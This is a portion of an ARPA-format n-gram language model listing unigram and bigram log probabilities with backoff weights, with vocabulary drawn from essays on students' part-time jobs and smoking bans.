-0.83856654 future . -0.70552063
-1.2458991 consider . -0.048957378
-0.65543157 skill . -0.187397
-1.4054539 academic . -0.048957378
-1.3935354 more . -0.187397
-1.3123941 employers . -0.048957378
-1.4223531 better . -0.048957378
-1.0946081 organization . -0.048957378
-1.1529151 industry . -0.048957378
-0.8736102 skills . -0.75667316
-1.0358967 important . -0.5805819
-1.0120412 employer . -0.048957378
-0.58033204 management . -0.27955192
-1.435324 taking . -0.048957378
-0.6345344 positively . -0.048957378
-1.4533774 through . -0.048957378
-1.1966463 productive . -0.048957378
-0.9450017 themselves . -0.27955192
-1.3627458 environment . -0.048957378
-0.63132155 position . -0.27955192
-1.0120412 abilities . -0.048957378
-1.2810172 same . -0.048957378
-0.9457105 financially . -0.187397
-0.58033204 issue . -0.27955192
-1.4707845 enough . -0.048957378
-1.3622978 food . -0.048957378
-0.73789895 times . -0.187397
-1.2557908 need . -0.187397
-0.6345344 emergency . -0.048957378
-0.73789895 earned . -0.187397
-1.433393 good . -0.048957378
-1.4532349 idea . -0.187397
-0.9517308 others . -0.187397
-0.85823375 like . -0.27955192
-1.2784038 parents . -0.50140065
-1.0731736 friends . -0.187397
-0.8628125 relationships . -0.187397
-1.1790495 people . -0.50140065
-1.2583388 true . -0.048957378
-1.3076993 College . -0.048957378
-0.8829074 stable . -0.048957378
-1.6067777 do . -0.048957378
-1.3633446 something . -0.048957378
-0.8829074 advantage . -0.048957378
-1.4549133 high . -0.048957378
-1.4432774 classes . -0.048957378
-1.3398672 know . -0.048957378
-0.24155144 ft. . -0.27955192
-1.5891082 all . -0.048957378
-1.0819532 them . -0.5805819
-0.6345344 futures . -0.048957378
-0.61219954 society . -0.6475287
-0.8829074 specialized . -0.048957378
-0.6345344 contexts . -0.048957378
-0.8829074 specialty . -0.048957378
-1.1529151 itself . -0.048957378
-0.6345344 specialization . -0.048957378
-0.8829074 fields . -0.048957378
-0.3848129 temptation . -0.187397
-1.2157034 activities . -0.187397
-0.6345344 socialize . -0.048957378
-0.6345344 results . -0.048957378
-0.8829074 teachers . -0.048957378
-1.0946081 demands . -0.048957378
-0.74016064 life . -1.0577031
-0.8829074 workforce . -0.187397
-1.0626299 responsibilities . -0.27955192
-1.178503 university . -0.27955192
-1.5058556 up . -0.048957378
-1.0946081 sleeping . -0.048957378
-0.6345344 repercussions . -0.048957378
-1.4300016 difficult . -0.048957378
-1.0946081 lifestyle . -0.048957378
-1.0334567 helpful . -0.187397
-1.1139877 regard . -0.048957378
-0.9457105 finances . -0.187397
-0.8829074 responsibly . -0.048957378
-1.2129301 cards . -0.048957378
-1.2129301 loans . -0.048957378
-0.5454324 etc. . -0.187397
-0.6345344 peril . -0.048957378
-1.0781795 income . -0.187397
-0.6345344 debts . -0.048957378
-1.2583388 expenses . -0.40449065
-0.86117655 family . -0.50140065
-1.2583388 adult . -0.048957378
-0.7572681 development . -0.187397
-1.2615209 independent . -0.048957378
-0.90136683 graduate . -0.40449065
-1.2941535 professional . -0.048957378
-0.84055513 customers . -0.27955192
-1.2994715 responsible . -0.048957378
-0.6345344 achievement . -0.187397
-0.8829074 necessity . -0.048957378
-1.284379 sense . -0.048957378
-1.2810172 force . -0.187397
-0.6345344 staff . -0.048957378
-0.6623816 situation . -0.187397
-1.2994715 year . -0.187397
-0.5871588 education . -1.0065507
-0.82075477 world . -0.5805819
-0.9789165 success . -0.187397
-1.1966463 entirely . -0.048957378
-0.8628125 importance . -0.187397
-1.3941447 own . -0.048957378
-0.6345344 pockets . -0.048957378
-1.2445956 transition . -0.048957378
-0.73789895 campus . -0.27955192
-0.6345344 cultivated . -0.048957378
-1.3918109 without . -0.048957378
-1.4285575 about . -0.048957378
-0.6345344 product . -0.048957378
-1.1139877 limited . -0.048957378
-1.0946081 assignments . -0.048957378
-1.2308197 either . -0.048957378
-0.9295806 too . -0.40449065
-0.8829074 complicated . -0.048957378
-0.58033204 business . -0.27955192
-0.8829074 ethic . -0.048957378
-1.588174 learn . -0.048957378
-0.86921066 lessons . -0.187397
-0.6345344 exhausting . -0.048957378
-0.6345344 straight . -0.048957378
-1.2308197 quit . -0.048957378
-0.58033204 beneficial . -0.40449065
-1.3337915 possible . -0.048957378
-1.1691996 years . -0.187397
-1.0120412 medicine . -0.048957378
-1.3330916 three . -0.048957378
-1.0120412 lesson . -0.048957378
-1.3774596 before . -0.048957378
-0.8829074 organizations . -0.048957378
-0.6345344 gates . -0.048957378
-1.2723796 meet . -0.048957378
-1.3722197 new . -0.048957378
-1.4377742 against . -0.048957378
-1.0946081 load . -0.048957378
-0.65543157 performance . -0.187397
-1.2750996 books . -0.048957378
-0.6345344 hindrance . -0.048957378
-0.97314656 worked . -0.187397
-0.8829074 workload . -0.048957378
-1.3486543 needs . -0.187397
-0.874662 costs . -0.27955192
-1.2458991 afford . -0.048957378
-0.5454324 process . -0.187397
-1.1529151 system . -0.048957378
-1.0946081 practice . -0.187397
-0.5205023 adults . -0.40449065
-0.6345344 counterparts . -0.048957378
-1.2308197 problem . -0.048957378
-1.2941535 since . -0.048957378
-1.0120412 concerned . -0.048957378
-0.8829074 sophisticated . -0.048957378
-1.2129301 effect . -0.048957378
-1.0672075 workplace . -0.40449065
-1.284379 instead . -0.048957378
-1.0120412 material . -0.048957378
-1.0946081 concern . -0.048957378
-0.8829074 worker . -0.048957378
-0.5205023 problems . -0.27955192
-1.2810172 families . -0.048957378
-0.6345344 began . -0.048957378
-1.1966463 far . -0.048957378
-0.6345344 immersed . -0.048957378
-1.0120412 rest . -0.048957378
-1.0081104 lives . -0.27955192
-1.103684 want . -0.187397
-0.8246384 things . -0.50140065
-0.6345344 drinks . -0.048957378
-1.0946081 harder . -0.048957378
-0.8829074 suffer . -0.048957378
-0.5454324 fun . -0.187397
-1.1966463 tasks . -0.048957378
-0.6345344 fatal . -0.048957378
-1.3902154 Japan . -0.50140065
-0.65543157 America . -0.187397
-0.67880464 freedom . -0.27955192
-1.4546726 think . -0.048957378
-1.2458991 anything . -0.048957378
-1.2941535 why . -0.048957378
-1.0120412 attend . -0.048957378
-0.65543157 wisely . -0.27955192
-0.6345344 commodity . -0.048957378
-1.421118 hours . -0.048957378
-0.8829074 5 . -0.048957378
-0.8087627 days . -0.27955192
-0.97314656 week . -0.187397
-1.0946081 easily . -0.048957378
-0.66825956 day . -0.40449065
-0.8829074 coworkers . -0.048957378
-0.6345344 underway . -0.048957378
-1.4443592 home . -0.048957378
-1.0995541 responsibility . -0.27955192
-1.1529151 homework . -0.048957378
-0.8829074 completed . -0.048957378
-1.0120412 lunch . -0.048957378
-1.0120412 mentioned . -0.048957378
-1.0081104 person . -0.187397
-0.6345344 twenties . -0.048957378
-0.6345344 remuneration . -0.048957378
-1.2941535 independence . -0.048957378
-1.0120412 easier . -0.048957378
-1.0120412 ask . -0.048957378
-0.6345344 Sydney . -0.048957378
-1.2583388 companies . -0.048957378
-0.8829074 test . -0.048957378
-0.8829074 character . -0.048957378
-0.8829074 thing . -0.048957378
-0.24155144 economy . -0.50140065
-0.6345344 attached . -0.048957378
-1.0120412 common . -0.048957378
-1.4497367 class . -0.187397
-0.6345344 faculty . -0.048957378
-1.0285724 individual . -0.187397
-0.8829074 coursework . -0.048957378
-1.3115425 discipline . -0.048957378
-0.6345344 details . -0.048957378
-1.0946081 co-workers . -0.048957378
-0.7177284 age . -0.27955192
-0.8829074 clear . -0.048957378
-0.8829074 finance . -0.048957378
-0.65543157 resources . -0.187397
-0.6345344 copywriting . -0.048957378
-0.8829074 office . -0.048957378
-0.6345344 newcomer . -0.048957378
-0.6345344 mentoring . -0.048957378
-0.6345344 career-oriented . -0.048957378
-0.6345344 branch . -0.048957378
-0.6345344 beings . -0.048957378
-0.75553894 opinion . -0.5805819
-1.2308197 us . -0.048957378
-0.8829074 under . -0.048957378
-1.1520863 allowed . -0.048957378
-0.8829074 conditions . -0.048957378
-0.6345344 fate . -0.048957378
-0.8829074 generations . -0.048957378
-0.6345344 irreversible . -0.048957378
-0.6345344 nation . -0.048957378
-0.6345344 production . -0.048957378
-0.6345344 agendas . -0.048957378
-0.6345344 accepted . -0.048957378
-1.39268 right . -0.048957378
-0.6345344 self-improvement . -0.048957378
-1.0946081 stage . -0.048957378
-0.6345344 self-supporting . -0.048957378
-0.8829074 whole . -0.048957378
-1.0334567 youth . -0.048957378
-0.8829074 schooling . -0.048957378
-0.8829074 purposes . -0.048957378
-1.0120412 desired . -0.048957378
-0.8829074 classroom . -0.048957378
-1.3000531 balance . -0.048957378
-0.8829074 points . -0.048957378
-0.8829074 socially . -0.048957378
-0.6623816 careers . -0.187397
-0.8829074 cities . -0.048957378
-0.6345344 ends . -0.048957378
-0.8829074 stronger . -0.048957378
-0.6345344 actions . -0.048957378
-1.1706125 together . -0.048957378
-1.0334567 lectures . -0.048957378
-0.6345344 degrees . -0.048957378
-1.0120412 expensive . -0.048957378
-1.0120412 busy . -0.048957378
-0.6345344 professionals . -0.048957378
-0.6345344 sources . -0.048957378
-0.8829074 faster . -0.048957378
-0.8628125 children . -0.187397
-1.4461821 had . -0.048957378
-0.6345344 pharmacy . -0.048957378
-0.8829074 1 . -0.048957378
-1.0120412 2 . -0.048957378
-1.0120412 3 . -0.048957378
-1.0120412 resume . -0.048957378
-0.8829074 4 . -0.048957378
-0.8829074 survive . -0.048957378
-0.8829074 vacation . -0.048957378
-0.8829074 path . -0.048957378
-0.6345344 homework\/assignments . -0.048957378
-1.0946081 using . -0.048957378
-0.8829074 initiative . -0.048957378
-1.0120412 customer . -0.187397
-1.2723796 spending . -0.048957378
-1.0120412 welcome . -0.048957378
-1.0120412 research . -0.048957378
-0.8829074 professor . -0.048957378
-0.8829074 merit . -0.048957378
-1.1706125 materials . -0.048957378
-1.2583388 large . -0.048957378
-0.8829074 changes . -0.048957378
-1.2941535 me . -0.048957378
-1.1529151 goal . -0.048957378
-0.5454324 rewarding . -0.187397
-0.8829074 everyday . -0.048957378
-0.6345344 bill . -0.048957378
-0.6345344 vacations . -0.048957378
-1.1529151 employees . -0.048957378
-0.6345344 multi-task . -0.048957378
-0.6345344 assignment . -0.048957378
-1.0120412 difficulties . -0.048957378
-0.6345344 yourself . -0.048957378
-0.5454324 entertainment . -0.187397
-0.6345344 porter . -0.048957378
-0.5454324 opinions . -0.27955192
-0.3848129 textbook . -0.187397
-0.6345344 lifetime . -0.048957378
-0.6345344 glife . -0.048957378
-1.0120412 clothes . -0.048957378
-1.0946081 groups . -0.048957378
-0.8829074 etiquette . -0.048957378
-0.6345344 language . -0.048957378
-1.0946081 weekends . -0.048957378
-0.6345344 regimen . -0.048957378
-0.6345344 absurd . -0.048957378
-1.1966463 habits . -0.048957378
-1.0120412 online . -0.048957378
-0.6345344 mentioning . -0.048957378
-0.6345344 failure . -0.048957378
-0.3848129 desires . -0.187397
-0.6345344 track . -0.048957378
-0.8829074 claim . -0.048957378
-0.6345344 enhancements . -0.048957378
-0.3848129 involved . -0.187397
-0.6345344 state . -0.048957378
-0.8829074 population . -0.048957378
-0.8829074 institutes . -0.048957378
-0.6345344 guardians . -0.187397
-0.6345344 earners . -0.048957378
-0.8829074 anyway . -0.048957378
-0.8829074 negligible . -0.048957378
-0.6345344 fine . -0.048957378
-0.6345344 discretion . -0.048957378
-0.6345344 casework . -0.048957378
-0.90891194 health . -0.27955192
-0.6345344 bulb . -0.048957378
-0.6345344 cherished . -0.048957378
-1.1139877 ideas . -0.048957378
-0.6345344 peers . -0.048957378
-0.8829074 exams . -0.048957378
-0.8829074 larger . -0.048957378
-0.6345344 threat . -0.048957378
-1.0946081 properly . -0.048957378
-0.8829074 exhaustion . -0.048957378
-1.0120412 heavily . -0.048957378
-0.8829074 smaller . -0.048957378
-0.8829074 nightclubs . -0.048957378
-0.8829074 Vegas . -0.048957378
-0.8829074 diploma . -0.048957378
-0.6345344 drug . -0.048957378
-0.6345344 prizes . -0.048957378
-0.6345344 proud . -0.048957378
-0.8829074 goals . -0.048957378
-0.6345344 holiday . -0.048957378
-1.0120412 partying . -0.048957378
-0.6345344 funds . -0.048957378
-0.9450017 restaurants . -0.70552063
-0.6345344 short-sighted . -0.048957378
-0.6345344 assistants . -0.048957378
-0.6345344 mastered . -0.048957378
-0.6345344 barricades . -0.048957378
-0.6345344 cobblestones . -0.048957378
-0.6345344 discouraged . -0.048957378
-0.6345344 States . -0.048957378
-0.6345344 consuming . -0.048957378
-0.6345344 existence . -0.048957378
-1.1529151 eat . -0.048957378
-0.6345344 sake . -0.048957378
-0.6345344 analysis . -0.048957378
-0.8829074 past . -0.048957378
-0.8829074 worries . -0.048957378
-0.6345344 falter . -0.048957378
-0.6345344 schoolwork . -0.048957378
-0.6345344 overwhelmed . -0.048957378
-0.6345344 doctor . -0.048957378
-1.0946081 here . -0.048957378
-0.6345344 volume . -0.048957378
-0.6345344 afterwards . -0.048957378
-0.6345344 pessimism . -0.048957378
-0.6345344 perspective . -0.048957378
-0.82472557 smoking . -0.50140065
-0.6345344 route . -0.048957378
-0.8554143 smoke . -0.50140065
-0.8829074 well-being . -0.048957378
-1.0120412 patrons . -0.048957378
-0.6345344 establishment . -0.048957378
-0.6345344 sick . -0.048957378
-0.8829074 everywhere . -0.048957378
-0.8829074 justified . -0.048957378
-0.6345344 citizens . -0.048957378
-0.65543157 non-smokers . -0.187397
-0.3848129 altogether . -0.187397
-0.6345344 stimulant . -0.048957378
-0.6345344 fair . -0.048957378
-0.6345344 lifestyles . -0.048957378
-0.6345344 account . -0.048957378
-0.6345344 ignored . -0.048957378
-0.6345344 illnesses . -0.048957378
-2.569465 <s> While -0.048957378
-2.7962124 <s> it -0.048957378
-2.071427 reasons it -0.048957378
-1.2569702 While it -0.048957378
-2.3158798 can it -0.048957378
-1.2936037 that it -0.47329462
-2.0652742 is it -0.04895735
-2.2450578 student it -0.048957378
-1.4679097 , it -0.28936014
-1.8596834 and it -0.04895735
-2.5097992 of it -0.048957378
-2.45246 to it -0.048957378
-2.2400465 from it -0.048957378
-2.2520611 working it -0.048957378
-1.581767 as it -0.20946135
-1.9890342 there it -0.048957378
-2.5044706 students it -0.048957378
-1.1415883 accomplish it -0.048957378
-1.4145563 leave it -0.048957378
-1.6620624 if it -0.048957378
-1.906007 then it -0.048957378
-1.2236197 but it -0.11268411
-1.5979834 agree it -0.048957378
-2.345031 have it -0.048957378
-2.2691255 money it -0.048957378
-1.7155147 And it -0.048957378
-1.4845351 making it -0.048957378
-2.0601783 some it -0.048957378
-1.4767239 does it -0.048957378
-1.9467757 or it -0.187397
-0.5228487 makes it -0.048957378
-1.8309565 themselves it -0.048957378
-1.9515239 into it -0.048957378
-1.7841237 ft it -0.048957378
-1.4743481 spend it -0.187397
-1.1415883 However it -0.048957378
-1.3856101 doing it -0.048957378
-2.130193 when it -0.048957378
-1.7233382 do it -0.048957378
-1.5723684 earn it -0.048957378
-1.9517244 while it -0.048957378
-1.8245562 take it -0.048957378
-1.6424872 know it -0.048957378
-1.3429189 what it -0.11268411
-0.807301 because it -0.1722646
-2.1785307 them it -0.048957378
-1.8999634 If it -0.04895735
-1.3488941 whatever it -0.048957378
-0.684236 Because it -0.048957378
-2.0614793 get it -0.048957378
-1.8513404 how it -0.187397
-1.8507375 believe it -0.40449065
-1.4169765 make it -0.048957378
-1.1415883 Firstly it -0.048957378
-1.7976577 living it -0.048957378
-1.5425271 however it -0.048957378
-1.880918 where it -0.048957378
-0.9370643 find it -0.13618872
-0.9364819 feel it -0.048957378
-1.4725379 So it -0.048957378
-0.9752691 hinder it -0.048957378
-1.7597054 getting it -0.048957378
-1.2614309 try it -0.048957378
-1.4845351 appreciate it -0.048957378
-1.3049499 think it -0.45249942
-0.9752691 knows it -0.048957378
-1.1415883 yet it -0.048957378
-0.684236 ... it -0.048957378
-1.653769 opinion it -0.048957378
-0.684236 rush it -0.048957378
-1.2569702 Although it -0.048957378
-0.684236 deem it -0.048957378
-0.684236 repay it -0.048957378
-1.3666724 banning it -0.048957378
-0.684236 nowadays it -0.048957378
-2.3334107 I can -0.048957378
-1.5800502 statement can -0.048957378
-1.6136544 it can -0.048957378
-2.0062232 that can -0.13618872
-1.7916571 job can -0.15886542
-1.6107941 full-time can -0.048957378
-1.939055 student can -0.048957378
-2.539219 , can -0.187397
-2.161529 and can -0.04895735
-2.1258276 study can -0.187397
-1.575828 studying can -0.13618872
-2.202622 experience can -0.048957378
-1.8187665 students can -0.048957378
-2.0941591 time can -0.187397
-1.553163 jobs can -0.11268411
-1.3493562 one can -0.04895735
-2.1068811 school can -0.048957378
-2.0763001 work can -0.048957378
-2.2926884 money can -0.048957378
-1.3953857 they can -0.12882008
-1.9845569 you can -0.048957378
-1.5400263 experiences can -0.048957378
-0.9774241 qualification can -0.048957378
-1.261102 organization can -0.048957378
-1.7504075 environment can -0.048957378
-1.5727148 There can -0.048957378
-1.9623224 parents can -0.048957378
-2.1816 people can -0.048957378
-1.7909907 They can -0.048957378
-1.9316736 This can -0.04895735
-1.261102 People can -0.048957378
-1.2651135 area can -0.048957378
-1.261102 nor can -0.048957378
-1.7714944 It can -0.13618872
-1.4205079 colleges can -0.048957378
-1.861024 how can -0.048957378
-2.1909645 life can -0.048957378
-1.3535233 result can -0.048957378
-1.0764526 which can -0.048957378
-1.2541722 family can -0.048957378
-1.3535233 period can -0.048957378
-1.576367 professional can -0.048957378
-1.5293787 someone can -0.048957378
-1.1447526 matter can -0.048957378
-1.3535233 back can -0.048957378
-1.1447526 Jobs can -0.048957378
-1.6517227 person can -0.048957378
-0.68533725 self-esteem can -0.048957378
-1.3535233 drinking can -0.048957378
-0.9774241 connections can -0.048957378
-0.9774241 coursework can -0.048957378
-1.6884791 he can -0.048957378
-1.6247382 age can -0.048957378
-1.6417441 we can -0.048957378
-0.68533725 bucks can -0.048957378
-0.9774241 damage can -0.048957378
-0.9774241 professor can -0.048957378
-1.5293787 large can -0.048957378
-0.68533725 owners can -0.048957378
-0.68533725 minds can -0.048957378
-0.9774241 individuals can -0.048957378
-0.9774241 relief can -0.048957378
-0.9774241 bars can -0.048957378
-1.9155476 smoke can -0.048957378
-0.68533725 Nothing can -0.048957378
-0.68533725 Smokers can -0.048957378
-2.5185547 it be -0.048957378
-0.77449536 can be -0.07191783
-2.4174626 student be -0.048957378
-0.97214806 will be -0.16607006
-2.6945138 , be -0.048957378
-1.9621344 often be -0.048957378
-1.2557942 not be -0.08909472
-2.6657038 and be -0.048957378
-1.5385488 to be -0.14854218
-1.0534738 also be -0.11310794
-2.5650504 time be -0.048957378
-0.8185822 may be -0.09038658
-1.157237 otherwise be -0.048957378
-0.5178241 should be -0.15640421
-1.3153728 only be -0.04895735
-1.7209004 To be -0.048957378
-1.5104494 even be -0.048957378
-1.965828 first be -0.048957378
-1.3192201 ft be -0.048957378
-0.7334877 could be -0.048957378
-2.2911224 all be -0.048957378
-0.7922647 must be -0.099168696
-1.6854032 n't be -0.048957378
-1.4465187 might be -0.048957378
-0.62215215 would be -0.066231176
-1.5708352 however be -0.048957378
-1.6111709 never be -0.048957378
-1.6090814 just be -0.048957378
-0.6896313 preciously be -0.048957378
-1.7188827 always be -0.048957378
-1.5067861 actually be -0.048957378
-1.5067861 us be -0.048957378
-1.3697741 certainly be -0.048957378
-0.6896313 t be -0.048957378
-0.98587745 \ be -0.048957378
-2.3119407 be argued -0.187397
-1.3161981 disagree that -0.048957378
-1.5195582 statement that -0.048957378
-2.1029716 for that -0.187397
-1.977956 reasons that -0.048957378
-1.933587 it that -0.048957378
-0.6761991 argued that -0.048957378
-2.2545807 that that -0.048957378
-1.4560189 job that -0.11268411
-1.4581163 is that -0.08422062
-2.0702202 student that -0.048957378
-1.8952377 , that -0.15838256
-2.0896373 not that -0.048957378
-1.3800348 case that -0.048957378
-1.7984354 employment that -0.048957378
-2.3107936 in that -0.048957378
-1.9064859 and that -0.048957378
-2.2850392 of that -0.048957378
-1.3161981 nature that -0.048957378
-2.170326 to that -0.04895735
-1.6763852 course that -0.048957378
-1.9690017 study that -0.048957378
-1.2867079 experience that -0.11268411
-1.770291 reason that -0.048957378
-1.655825 students that -0.09038658
-1.924023 studies that -0.048957378
-1.9800833 time that -0.048957378
-1.5073028 jobs that -0.04895735
-1.955836 one that -0.048957378
-1.9677188 school that -0.048957378
-1.9631096 work that -0.048957378
-1.6653233 being that -0.048957378
-2.0027235 if that -0.048957378
-1.4692521 f that -0.048957378
-1.9557992 such that -0.048957378
-1.8512307 but that -0.048957378
-1.0383663 agree that -0.26892814
-2.1262746 money that -0.048957378
-0.5449403 say that -0.04895735
-1.6360705 And that -0.048957378
-1.928339 so that -0.048957378
-0.6761991 advertisements that -0.048957378
-1.4321607 positions that -0.048957378
-1.2276541 ways that -0.048957378
-1.4881768 experiences that -0.048957378
-1.475821 benefits that -0.048957378
-1.2351948 skill that -0.048957378
-1.7570267 better that -0.048957378
-1.3089265 industry that -0.048957378
-1.0961084 skills that -0.099168696
-1.6803458 important that -0.048957378
-1.6545362 environment that -0.048957378
-0.6761991 complain that -0.048957378
-1.7697875 enough that -0.048957378
-1.609811 food that -0.048957378
-1.6333432 idea that -0.048957378
-1.4465711 parents that -0.048957378
-1.439056 relationships that -0.048957378
-2.0009093 people that -0.048957378
-1.4253732 see that -0.048957378
-1.3089265 show that -0.048957378
-0.76009446 something that -0.048957378
-1.1038072 know that -0.187397
-1.1189373 opportunities that -0.048957378
-2.0039754 all that -0.048957378
-1.9398266 get that -0.048957378
-1.3800348 club that -0.048957378
-1.7805085 activities that -0.048957378
-1.4253732 workers that -0.048957378
-1.2276541 demands that -0.048957378
-0.516151 believe that -0.19768323
-1.6987407 life that -0.04895735
-1.6328945 responsibilities that -0.048957378
-1.1189373 aware that -0.048957378
-1.3730136 factor that -0.048957378
-1.5067358 force that -0.048957378
-1.8510748 world that -0.048957378
-0.6761991 consequence that -0.048957378
-1.8360258 out that -0.048957378
-1.1189373 energy that -0.048957378
-1.4692521 someone that -0.048957378
-1.4321607 feel that -0.048957378
-1.1189373 subjects that -0.048957378
-1.3748116 than that -0.048957378
-0.6761991 imply that -0.048957378
-1.5130997 just that -0.048957378
-1.1189373 lesson that -0.048957378
-0.8401329 understand that -0.048957378
-0.95969737 power that -0.048957378
-1.3089265 system that -0.048957378
-1.3800348 effect that -0.048957378
-0.6761991 hope that -0.048957378
-0.6761991 follows that -0.048957378
-1.3932617 problems that -0.048957378
-0.6761991 waters that -0.048957378
-0.8738127 things that -0.11268411
-1.5392416 Students that -0.048957378
-0.6523933 think that -0.048957378
-0.92316115 anything that -0.048957378
-0.95969737 argue that -0.048957378
-1.5130997 why that -0.048957378
-1.3089265 homework that -0.048957378
-1.1189373 lunch that -0.048957378
-0.46796864 realize that -0.04895735
-1.1189373 discover that -0.048957378
-0.6761991 saying that -0.048957378
-0.95969737 fact that -0.04895735
-1.109652 opinion that -0.04895735
-1.3089265 policy that -0.048957378
-0.6761991 gains that -0.048957378
-0.95969737 points that -0.048957378
-0.6761991 belief that -0.048957378
-0.95969737 doubt that -0.048957378
-1.2276541 With that -0.048957378
-0.6761991 field\/industry that -0.048957378
-1.1267675 seems that -0.048957378
-0.95969737 seen that -0.048957378
-1.3089265 employees that -0.048957378
-0.6761991 feels that -0.048957378
-0.6761991 structures that -0.048957378
-0.6761991 life-lesson that -0.048957378
-0.6761991 self that -0.048957378
-0.6761991 recommend that -0.048957378
-0.6761991 burdens that -0.048957378
-0.6761991 aspect that -0.048957378
-1.1267675 said that -0.048957378
-0.6761991 seemed that -0.048957378
-0.6761991 media that -0.048957378
-0.95969737 popular that -0.048957378
-0.6761991 Assuming that -0.048957378
-0.95969737 goals that -0.048957378
-0.6761991 cogitation that -0.048957378
-0.6761991 assume that -0.048957378
-0.6761991 heard that -0.048957378
-2.5958927 with having -0.048957378
-2.4080775 for having -0.048957378
-2.3830268 that having -0.187397
-2.4748268 is having -0.048957378
-2.022009 , having -0.37807262
-2.6035779 not having -0.048957378
-2.341326 by having -0.048957378
-2.1752987 and having -0.048957378
-2.0305338 of having -0.2403142
-3.0623753 to having -0.187397
-2.8203194 students having -0.048957378
-2.112976 but having -0.048957378
-1.9406985 believe having -0.187397
-1.2867545 Not having -0.048957378
-1.2760465 without having -0.187397
-1.5793368 between having -0.048957378
-1.8934716 think having -0.048957378
-1.5226038 actually having -0.048957378
-1.1739521 with a -0.07333779
-1.0912147 for a -0.07465968
-2.045371 can a -0.048957378
-1.2453445 be a -0.066231176
-1.7364441 that a -0.14912641
-0.46919647 having a -0.5129156
-2.022187 job a -0.048957378
-1.0084472 is a -0.101657696
-1.9704068 student a -0.048957378
-1.5820451 , a -0.21179748
-1.7040949 often a -0.048957378
-1.6529956 not a -0.04895735
-1.685472 In a -0.048957378
-1.184262 cases a -0.048957378
-1.4065168 by a -0.13618872
-1.023314 in a -0.12436704
-1.6733795 and a -0.048957378
-1.2570825 of a -0.15828148
-1.695535 to a -0.087055564
-1.2102299 has a -0.04895735
-1.9556051 experience a -0.048957378
-0.8583615 gain a -0.048957378
-1.3920106 from a -0.048957378
-1.1591635 working a -0.3269201
-0.7682663 as a -0.086061224
-1.8707192 students a -0.04895735
-1.4323175 Such a -0.187397
-0.94793266 mean a -0.048957378
-1.4105668 on a -0.09038658
-1.6129414 also a -0.048957378
-1.1020619 accomplish a -0.048957378
-1.3735784 work a -0.13618872
-1.2014738 being a -0.048957378
-1.32343 if a -0.30637136
-0.91683936 such a -0.048957378
-1.7202098 then a -0.048957378
-1.3431742 pursuing a -0.048957378
-1.6536006 pay a -0.048957378
-1.0163296 have a -0.45843184
-1.7795784 you a -0.048957378
-1.4163891 making a -0.048957378
-1.4744501 following a -0.048957378
-1.5516328 To a -0.048957378
-1.3748144 become a -0.04895735
-0.94793266 guarantee a -0.048957378
-1.4618114 or a -0.048957378
-1.7457005 even a -0.048957378
-1.514834 are a -0.048957378
-0.77896816 As a -0.13618872
-1.4744501 offer a -0.048957378
-1.8568234 more a -0.048957378
-0.85208535 whether a -0.048957378
-1.1663418 taking a -0.048957378
-1.3119683 through a -0.048957378
-0.9547594 into a -0.048957378
-0.9927116 at a -0.0796529
-1.1020619 Having a -0.43442175
-1.7741511 need a -0.048957378
-1.6174822 like a -0.048957378
-1.328294 doing a -0.048957378
-1.941914 when a -0.048957378
-1.4824228 earn a -0.11268411
-1.2879579 take a -0.13618872
-1.3687944 chance a -0.048957378
-1.5365813 know a -0.048957378
-1.8570228 what a -0.048957378
-1.2702285 them a -0.11268411
-0.9871 provide a -0.048957378
-1.7106837 If a -0.3855526
-0.63674825 get a -0.23204191
-1.7201445 believe a -0.048957378
-1.4558547 entering a -0.048957378
-1.206096 particularly a -0.048957378
-1.7799845 up a -0.048957378
-1.7093724 make a -0.048957378
-1.521916 still a -0.048957378
-1.3918545 quite a -0.048957378
-0.94793266 Maintaining a -0.048957378
-1.309868 managing a -0.048957378
-0.94793266 least a -0.048957378
-1.4323175 been a -0.048957378
-1.3154595 during a -0.048957378
-0.9679041 earning a -0.048957378
-0.86637026 lead a -0.048957378
-1.1210268 enjoy a -0.048957378
-1.4357413 once a -0.048957378
-0.94793266 require a -0.048957378
-1.466621 force a -0.048957378
-1.89936 education a -0.048957378
-1.206096 balancing a -0.048957378
-0.46515924 finding a -0.13618872
-0.85208535 provides a -0.048957378
-1.2830615 improve a -0.048957378
-0.94793266 Without a -0.048957378
-1.4404591 place a -0.048957378
-1.3988943 out a -0.048957378
-1.7400194 where a -0.048957378
-1.1020619 giving a -0.048957378
-1.206152 find a -0.13618872
-0.94793266 Should a -0.048957378
-1.206096 requires a -0.048957378
-1.6571989 support a -0.048957378
-1.2830615 last a -0.048957378
-1.1020619 building a -0.048957378
-1.8593731 learn a -0.048957378
-0.67003465 pursue a -0.048957378
-1.6988808 than a -0.048957378
-1.4404591 enter a -0.048957378
-0.67003465 secure a -0.048957378
-1.4404591 meet a -0.048957378
-1.5036985 worked a -0.048957378
-1.4253675 costs a -0.048957378
-0.72692496 getting a -0.11268411
-1.2830615 hold a -0.048957378
-1.1633122 hours a -0.187397
-1.5843508 days a -0.048957378
-1.1122347 risk a -0.048957378
-0.5695075 adding a -0.048957378
-0.94793266 securing a -0.048957378
-1.1020619 studied a -0.048957378
-0.9130517 obtain a -0.048957378
-1.1020619 -- a -0.048957378
-0.94793266 instils a -0.048957378
-0.67003465 opens a -0.048957378
-1.1020619 yet a -0.048957378
-1.1020619 planning a -0.048957378
-0.94793266 Taking a -0.048957378
-1.1020619 developing a -0.048957378
-1.1020619 sometimes a -0.048957378
-0.94793266 generations a -0.048957378
-0.94793266 On a -0.048957378
-1.4961588 balance a -0.048957378
-0.2673626 becoming a -0.048957378
-1.4404591 develop a -0.048957378
-1.206096 When a -0.048957378
-1.1020619 receive a -0.048957378
-1.2171772 had a -0.048957378
-1.206096 given a -0.048957378
-0.94793266 nights a -0.048957378
-0.77896816 within a -0.048957378
-0.94793266 profit a -0.048957378
-0.5695075 puts a -0.048957378
-1.4744501 me a -0.048957378
-0.94793266 seeing a -0.048957378
-1.206096 over a -0.048957378
-0.67003465 experienced a -0.048957378
-0.688208 creating a -0.048957378
-0.67003465 gauge a -0.048957378
-0.67003465 devised a -0.048957378
-0.67003465 deserves a -0.048957378
-0.94793266 purchase a -0.048957378
-0.94793266 demand a -0.048957378
-0.67003465 seeking a -0.048957378
-0.94793266 challenge a -0.048957378
-0.94793266 Doing a -0.048957378
-0.5695075 obtaining a -0.048957378
-0.67003465 assets a -0.048957378
-0.94793266 supporting a -0.048957378
-0.94793266 creates a -0.048957378
-0.67003465 yields a -0.048957378
-0.94793266 Yet a -0.048957378
-0.67003465 deter a -0.048957378
-0.67003465 poses a -0.048957378
-0.5695075 down a -0.048957378
-0.67003465 landing a -0.048957378
-0.67003465 train a -0.048957378
